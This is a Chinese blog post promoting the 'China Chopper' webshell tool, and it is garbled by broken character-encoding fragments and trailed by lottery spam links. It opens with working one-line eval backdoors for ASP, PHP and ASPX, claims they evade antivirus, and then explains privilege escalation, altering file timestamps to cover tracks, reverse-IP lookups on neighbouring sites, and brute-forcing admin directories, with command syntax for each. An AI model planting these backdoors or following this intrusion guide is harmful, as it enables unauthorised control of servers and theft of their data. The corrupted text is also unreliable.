中国菜刀高级使用方法总汇

Asp环境:<%evalrequest("a")%>

Php环境:<[email protected]($_POST['a']);?>

Aspx环境:<% @pageLanguage="Jscript"><%eval(Request.item["a"],"unsafe");%>

一个名不见经传的“中国菜刀?#20445;?#23601;可?#28304;?#26367;我那搜集了几年,大大小小几百个多?#21046;教?#22810;种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可?#28304;?#26367;那些后门,而且他的功能超出我的想象,就让我慢慢说明吧。

1.就从最基本的讲起,你的脚本是不是经常被杀,你怎么变形都被杀,,传到服务器被杀导致被管理员发现,结果你的权限就没了,杀到你欲哭无泪。菜刀的一句话后门,可?#21592;?#20813;这个问题,只有短短的一行代码,永远不会被查杀。

2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了,框架变形,字体变框框,点击菜单无效,这个?#19988;?#20026;系统语言不兼容造成?#27169;?#33756;刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。

3.你是不是有很多webshell,你每次都拿记事本记下来,需要的时候,又去翻半天,弄得你很累很没脾气。有了“菜刀?#20445;?#20320;可以很方便管理你的webshell,所有的记?#32423;?#20445;存在?#29992;?#30340;本地数据库里,而且支持webshell分类,让你管理得井井有条。菜刀不仅有临时锁定功能,方便你离开电脑的那小会时间不被别人?#30340;?#30340;webshell,也有?#29992;?#21151;能,不输对密码,HOHO,偷了你的数据也没用。

4.再来说说数据库管理,这个是菜刀最最强大的功能,精通各?#25945;?#20027;流数据库的作者,把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库,支持不是最主要?#27169;?#21151;能强大,人性化才是最主要?#27169;?#33756;刀”的数据库操作界面,内置了常用的数据库语句,非常直观的表列名浏览功能,?#36828;?#26174;示表名,列名,查询语句,非常人性化的设计,更内置了不少自建的函数,方便不懂数据库的菜鸟,都能查阅数据库里的数据,再说个“菜刀”数据库管理的一个小技巧,对于access数据库,可以在菜刀的webshell操作界面,对着MDB文件点右键,点Access Management,就直接进入Access的数据库操作界面了,方便吧,嘿嘿!!

5.再说说提权这块,webshell的提权总是最让人关心?#27169;?#35828;?#25945;?#26435;,就不能说到webshell上的cmd执行了,有些朋友并不了解菜刀的自定义CMD路径功能,有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了,同样?#27169;?#20877;给个cmd使用的小技巧,在菜刀的命令行里,可以使用cd?#35753;?#20196;跳转目录,方便吧,嘿嘿!!嗯,另外,新版菜刀新增常用目录管理功能,你可以把你常用的目录或者提权的目录加进菜刀里,这样很方便你提权或者日常工作,是不是比那些固定了提权目录的脚本后门要牛B的多啊,哈哈。

6.还有菜刀的webshell上的文件功能功能,也是非常人性化?#27169;?#25991;件夹和文件的图标完全模枋windows,,文件日期,文件大小,文件权限,一目了然,尤其是修改文件时间功能,非常的方便,直接对着要修改时间的文件点右键,modify the file time,然后在文件的时间那栏,输入时间,回车,就修改完了。当然,菜刀的文件管理还有新建,?#22659;?#19978;传,下载,编辑功能,这些大同小异,就不一一细说了。不过有个功能,还?#19988;?#37325;点说明?#27169;?#37027;就是目录缓存功能,菜刀可以把浏览过的webshell目?#32423;?#32531;存在本地,这样可以方便下次访问的时候更加快捷,最重要的是,当哪天你的权限丢了,起码你还有对方服务器的文件目录结构,方便再一次渗透。

说完大家都有的脚本后门功能,现在来说点特别的菜刀功能,非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器,再结合了作者之前的web管理软件等几个工具的优点,实在是大杀器的集合体。

1:蜘蛛爬?#23567;?#25105;很?#19981;?#29992;WVS,对于WEB安全这块,功能是非常的强大,我很?#19981;?#37324;面的一个功能,目录爬行,可以把WEB站的文件目录结构以很直观的形?#33050;?#21015;出来,很方便分析。我非常惊喜的发现,菜刀居然也有这个功能,叫蜘蛛爬?#23567;?/p>

用法:

{spider} {url:http://www.baidu.com/}

设定爬行范围

{spider} {url:http://www.baidu.com/}{range:baidu.com}


跟WVS的功能完全一样,我上次上传webshell?#35745;?#30340;时候,不知道脚本后门给传到哪个目录,结果用菜刀的蜘蛛爬行功能?#39029;?#26469;了,真是强大。

2:旁注查询。在渗透的时候,旁注是非常关键?#27169;?#19981;知有多少大站是死在他邻居的进攻下啊。你见过查询同服务器的所有域名,那你见过查询同C段的所有域名不,呵呵,菜刀就可以做到

用法:

查单一IP的绑定域名

{reverse_ip} {url:http://www.baidu.com/}

扫描本C段开放的WEB服务器,并查询绑定域名

{reverse_ip_c} {url:http://www.baidu.com/}

3:字典爆破功能。你是不是很?#19981;秝ebtool的目录扫描功能呢,?#28909;?#33756;刀是集大成之所有者,自然是不会少了这个功能?#27169;?#32780;且功能更加强大。

用法:

{crack} {url:http://%s/admin/} {flag:HTTP/1.1200} {dict:list.txt}

{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1404} {dict:list.txt}

{crack} {url:http://www.baidu.com/%s/} {flag:successfully}{dict:list.txt}

%s为dict中的一行,flag:后面为返回的数据(含HTTP头部)中的特定关键字,加!!为不包含关键字为TRUE,否则包含关键字为TRUE, list.txt为当前目录下的文件,可设为绝?#26376;?#24452;,注意:不要包含太多的?#23567;?/p>

这个目录爆破功能,是非常灵活跟强大?#27169;?#39318;先,可以根据返回的数据包自定义来判断目录是否存在,然后可?#21592;?#30772;已知目录的上级目录,举个例子,假如你知道你的目录是guanli,但是你是不知道guanli这个目录是在哪个目录里面,那么你可以

{crack} {url:http://www.baidu.com/%s/guanli/}{flag:HTTP/1.1 200} {dict:list.txt}

其实菜刀还是一个浏览器,真?#27169;?#19981;骗你,菜刀的浏览器功能,非常简单,却非常实用,可以很方便的禁止或者开启网站的脚本、控件执行,?#35745;?#26174;示开关,最最方便?#27169;?#36824;是cookies编辑功能了,这个是非常重要?#27169;?#35841;用谁知道。菜刀的浏览器是可以直接post提交?#27169;?#36825;个功能有什么用,相信黑黑们也不用我多说了吧。另外一个,就是自定义JS,这个据说也是很强大?#27169;?#20294;我暂?#34987;?#27809;用到这个功能。

总结一下,菜刀一直在完善,一直在更新,发展到现在,已经不仅仅是一个webshell管理器,可以说是一个大杀器的集合体,就算完全抛弃里面的webshell管理功能,菜刀也是一个很不错的浏览器,很不错的后台扫描工具,很不错的cookies编辑提交工具,很不错的文件管理工具,很不错的旁注软件,不单是方便各?#32531;?#23458;朋友使用,也很方便站长使用,毕竟里面的文件管理功能,上传下载,比FTP更?#21448;?#35266;了,最重要?#27169;?#33756;刀的数据库管理功能,真的是前无古人,后无来者,非常非常方便,?#29616;?#25512;荐大家使用。

另附作者的下一步开发计划,菜刀即将支持JSP,CFM等等,更加灵活,也考虑开放菜刀的协议跟接口,这样的话,大家可以自由写插件,也不局限于eval这样的一句话后门,另外,菜刀也将继续保持以人为本的人性化设计,会更加灵活!


评论:

2 条评论

发表评论 取消回复

电子邮件地址不会被公开。 必填项已用*标注

2018-2019cba开赛时间
福彩3d走势图大全 11选5开奖安徽 49选7走势图分布图 上海福彩网选四开奖 冰球鞋磨刀专业术语 上海快三走势图表三基本走势图表 cba全明星投票 福彩幸运武林直播 北京时时彩结果查询 冰球海报 十一运夺金专家预测 新疆25选7几点开奖 高频彩票设计的原理 马来三分彩开奖历史记录 新疆十一选五推荐号码